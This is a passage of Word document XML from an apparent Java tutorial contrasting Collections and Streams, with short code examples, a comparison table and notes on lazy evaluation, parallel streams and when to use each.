    <w:p w14:paraId="35C4F498" w14:textId="77777777" w:rsidR="00F609ED"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C658B04">
          <v:rect id="_x0000_i1476" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE8486E" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Performance Considerations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2F7C4D" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C075BB" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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Eager operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can result in immediate performance hits if the collection is large or if modifications are frequent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F71662A" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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llections can hold large amounts of data, but the performance of operations like filtering or transformations can be slow when done repeatedly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69544B" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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reams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD37E77" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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azy evaluation</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> improves performance because intermediate operations are only performed when a terminal operation is invoked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA75E11" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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rallel Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can help improve performance for large data sets, especially when the processing can be split into independent tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D08CEB" w14:textId="77777777" w:rsidR="00F609ED"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92C794">
          <v:rect id="_x0000_i1477" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAC592" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Examples</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493A66B4" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Using Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6082DA1C"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F65265"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C3A797" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2700F67E"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CollectionExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD00D0"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07150F85"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String&gt; list = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0120C8"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apple");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C536CBA"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banana");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477EEDC4"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cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B745C01"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9FA9077"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or (String fruit : list) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C851A0B"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fruit);  // Eager processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2944F8A8"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60404A5"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3330FF2"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8F7A73C" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Using Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD76711"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s;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2599A87B"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st;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E13E18" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6617D62A"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treamExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7FF2FB"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36996C56"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String&gt; list = Arrays.asList("apple", "banana", "cherry");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DE0153"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DE59E12"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stream()  // Creating a stream from the collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE1F55"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lter(fruit -&gt; fruit.startsWith("a"))  // Intermediate operation (lazy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634F765"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orEach(System.out::println);  // Terminal operation (eager)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39038661"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74702EA"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A47B661" w14:textId="77777777" w:rsidR="00F609ED"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FFF82A2">
          <v:rect id="_x0000_i1478" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2C8C3F" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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Operations Comparison</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="240CFAAC" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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perations on Collections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F94B4A" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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dd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements using add(), remove(), etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CA0F35" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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terate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using loops, for-each, or iterators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B61601" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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perations on Streams:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44771594" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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termediate operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: filter(), map(), sorted(), distinct(), etc. (lazy operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2783BA37" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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erminal operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: collect(), reduce(), forEach(), count(), etc. (eager operations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="038B9598" w14:textId="77777777" w:rsidR="00F609ED"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8436315">
          <v:rect id="_x0000_i1479" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF691E2" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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7. Summary of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8"/>
        <w:gridCol w:w="2917"/>
        <w:gridCol w:w="5609"/>
      </w:tblGrid>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="193FD3AF" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3A473E47" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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5A2D05F4" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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llections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0C4A4B85" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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reams</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="6FD947DA" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40A8940D"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p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E448866"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ata storage and manipulation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46316415"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ata processing (functional style).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="373D9F4F" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA6684F"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odification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73FC911D"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utable (direct modification of data).</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B57ED76"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mutable (modifies data via pipelines).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="3ABA3AA9" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52157290"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ata Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BD8E87D"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irect access to elements.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5BC5A5"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ccess elements via functional operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="46DAC5EE" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="156938A5"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Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00AEBDDB"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ger execution.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB6189B"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azy execution (operations are done only when terminal operation is called).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="7B4E5F1D" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51E815AD"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rallel Processing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4F945BFF"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t parallel by default.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099A30CA"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pports parallel processing using parallelStream().</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00962441" w:rsidRPr="00CE4B95" w14:paraId="235B1057" w14:textId="77777777" w:rsidTr="00F609ED">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08A3E269"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 Collection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="123187D3"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 Set, Queue, Map.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11346D8A" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="0096244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eam&lt;T&gt;.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="778E9ED6" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="009624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C3CFB7C">
          <v:rect id="_x0000_i1480" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="357071A7" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED"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to Use Collections vs Streams</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C4DB86" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ollections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2684EF" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>modify</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the data (e.g., adding/removing elements).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC6BC2F" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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want to store and manage a collection of elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2E3E79" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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are working with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>simple operations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like searching or iterating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1F9B46" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> when:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539494E2" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>process</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> elements in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional style</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062094BF" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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need </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</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parallel processing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF7136B" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7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want to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>transform, filter, and aggregate</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> data in a clean and expressive way.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF2A26D" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="0096244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534DEC97" w14:textId="77777777" w:rsidR="00F609ED" w:rsidRPr="00CE4B95" w:rsidRDefault="00F609ED" w:rsidP="00962441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are primarily for storing and manipulating data, while </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are used for processing sequences of elements in a more functional and declarative way.</w:t>
      </w:r>
